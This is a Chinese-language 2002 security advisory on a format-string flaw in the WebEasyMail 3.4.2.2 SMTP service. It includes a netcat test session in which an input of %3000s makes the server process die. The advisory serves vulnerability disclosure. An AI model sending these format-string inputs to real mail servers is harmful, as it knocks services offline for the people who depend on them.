WebEasyMail SMTP Service存在格式字符串攻击发布时间:2002-08-29 更新时间:2002-08-29 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:5518 受影响系统 WebEasyMail WebEasyMail 3.4.2 .2详细描述 WebEasyMail是发送接收邮件的服务程序。 其中对用户提交给SMTP服务的命令缺少过滤,攻击者使用格式字符串作为命令提交给SMTP服务,可导致产生拒绝服务攻击,可能存在执行任意代码的可能。 测试代码 $ nc localhost 25 220 ESMTP on WebEasyMail [3.4.2.2] ready. http://www.winwebmail.com %2 502 Error: command not implemented %2s 502 Error: command not implemented %100s 502 Error: command not implemented %3000s [emsrv.exe silently dies here] $ 解决方案 无 相关信息 Stan Bubrouski <stan@ccs.neu.edu>. 参考:http://online.securityfocus.com/archive/1/288222 相关主页:http://www.winwebmail.com/ |
